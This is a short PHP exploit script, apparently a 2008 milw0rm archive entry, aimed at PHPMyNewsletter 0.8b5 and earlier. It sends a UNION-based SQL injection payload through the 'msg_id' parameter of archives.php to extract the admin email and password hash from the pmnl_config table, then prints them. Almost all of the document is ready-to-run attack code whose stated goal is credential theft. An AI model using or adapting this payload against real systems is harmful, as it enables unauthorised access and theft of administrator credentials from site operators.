phpMyNewsletter 0.8b5 - 'msg_id' SQL Injection

#!/usr/bin/php
<?php
/*
 * Name:    PHPMyNewsletter <= 0.8b5 SQL Injection
 * Credits: Charles "real" F. <charlesfol[at]hotmail.fr>
 * Date:    03-10-08
 * Conditions: magic_quotes_gpc=Off
 *
 * This exploit gets admin_pass and admin_email from pmnl_config.
 */
 
print "\n";
print "   PHPMyNewsletter <= 0.8b5 SQL Injection\n";
print "       by real <charlesfol[at]hotmail.fr>\n\n";
 
if($argc<2) die("usage: php phpmynewsletter_sql.php <url>\n");
$url  = $argv[1];

$c = get($url."archives.php?msg_id='%20UNION%20SELECT%201,1,admin_email,admin_pass%20%20FROM%20pmnl_config%2f%2a&list_id=1");

if(preg_match("#<div class='archivetitle'>(.+) - 0000-00-00 00:00:00</div>#i",$c,$a) && preg_match("#<div class='subcontent'>\t([a-f0-9]{32})</div></div>#i",$c,$b))
{
	print "[*] Mail:\t$a[1]\n";
	print "[*] Password:\t$b[1]\n";
}
else
{
	print "[*] Exploit failed\n";
}

function get($url,$get=1)
{
	$result = '';
	preg_match("#^http://([^/]+)(/.*)$#i",$url,$infos);
	$host = $infos[1];
	$page = $infos[2];
	$fp = fsockopen($host, 80, &$errno, &$errstr, 30);
	
	$req  = "GET $page HTTP/1.1\r\n";
	$req .= "Host: $host\r\n";
	$req .= "User-Agent: Mozilla Firefox\r\n";
	$req .= "Connection: close\r\n\r\n";

	fputs($fp,$req);
	
	if($get) while(!feof($fp)) $result .= fgets($fp,128);
	
	fclose($fp);
	return $result;
}

?>

# milw0rm.com [2008-03-10]